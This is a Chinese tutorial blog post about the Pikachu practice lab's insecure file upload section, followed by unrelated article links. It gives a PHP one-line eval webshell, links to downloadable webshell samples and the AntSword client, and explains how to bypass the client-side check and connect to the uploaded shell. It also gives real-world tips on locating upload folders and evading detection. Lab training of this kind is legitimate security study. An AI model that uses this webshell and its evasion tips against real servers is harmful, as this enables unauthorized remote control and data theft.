当前位置: 首页 > news >正文

Unsafe Fileupload篇补充-木马的详细教程与木马分享(中国蚁剑方式)

在之前的皮卡丘靶场第九期Unsafe Fileupload篇中我们学习了木马的原理并且学了一个简单的木马文件

本期内容是为了更好的为大家解释木马(服务器方面的)的原理,连接,以及各种木马及连接工具的分享

文件木马:https://wwhc.lanzoue.com/iDYwL2ybhw4b

图片木马:https://wwhc.lanzoue.com/idhXN2ybhw2j

中国蚁剑:加载器:https://wwhc.lanzoue.com/iHq4B2yfi8yh

源码:https://wwhc.lanzoue.com/iT5ZI2yfhwzg

如果可以用github:https://github.com/AntSwordProject/

为了更好的演示,本期还是以之前Unsafe Fileupload篇制造的木马为例

同时再拓展一下木马的种类,我们用到的是一句话木马,短小精干,此外还有大马,可以干的事情更多,但是上传难度更大

打开加载器把中国蚁剑初始化,选择目录为源码的下载目录后即可使用(或者不下载源码,选择一个空目录,让加载器自己下载源码)

我们还是以皮卡丘靶场第九期Unsafe Fileupload篇的内容为例进行

<?php  @eval($_POST['shell']); ?>

根据之前我们知道的,client check中我们可以通过F12禁用JavaScript来将木马上传进去

由此我们知道了上传的文件到了哪里,我们接下来用蚁剑来连接

我这里的url为

http://172.30.160.107/pikachu/vul/unsafeupload/uploads/1.php

ipv4的地址可以通过cmd输入ipconfig来获取

根据各位的情况来修改即可

我们右键选择添加数据后,填入url和密码(密码就是上面的shell)

编码器酌情选择,默认的话就是明码数据,被发现的话一抓一个准,这里用默认的演示

可以看到成功了

在此说明一下,在靶场中我们可以通过查看前端文件来了解木马文件上传位置,在实际操作中我们不可能提前知道,所以要细心观察,通常获取位置的方式有抓包或者通过常用文件夹来试探比如常见的文件夹有/uploads/、/files/、/images/

上传方面经常会用到免杀,隐写等方式来避免被识别

进去以后可以看到出货了

完成

至此,Unsafe Fileupload篇-木马补充完成

相关文章:

  • 《Minio 分片上传实现(基于Spring Boot)》
  • LINUX 69 FTP 客服管理系统 man 5 /etc/vsftpd/vsftpd.conf
  • 第一章 空间解析几何与向量代数 ~ 空间直角坐标系
  • 人工智能100问☞第43问:什么是提示工程(Prompt Engineering)?
  • Python 训练 day46
  • LeetCode - 3. 无重复字符的最长子串
  • 项目管理进阶:解析112页IPD集成产品开发高层培训【附全文阅读】
  • 十一、MySQL 事务底层与高可用原理
  • FDA方向图的matlab仿真实现
  • Linux【5】-----编译和烧写Linux系统镜像(RK3568)
  • 力扣HOT100之栈:394. 字符串解码
  • 【RAG排序】rag排序代码示例-高级版
  • 基于PHP的连锁酒店管理系统
  • 英国云服务器上安装宝塔面板(BT Panel)
  • cie数通的含金量高吗?费用多少?
  • MySQL--慢查询日志、日志分析工具mysqldumpslow
  • 由于 z(x,y) 的变化导致的影响(那部分被分给了链式项)
  • 动画直播如何颠覆传统?解析足球篮球赛事的数据可视化革命
  • 深度剖析OpenSSL心脏滴血漏洞与Struts2远程命令执行漏洞
  • ShuffleNet 改进:与通道注意力机制(CAM)的结合实现
  • 如何做房产网站/软文推广服务
  • 广州高端网站建设/免费自媒体网站
  • 专业建站公司电话咨询/新闻软文自助发布平台
  • 做购物网站需不需要交税费/seo关键字优化价格
  • 建设银行网站修改手机号/网络营销有本科吗
  • 有什么做衣服的网站/百度seo排名技术必不可少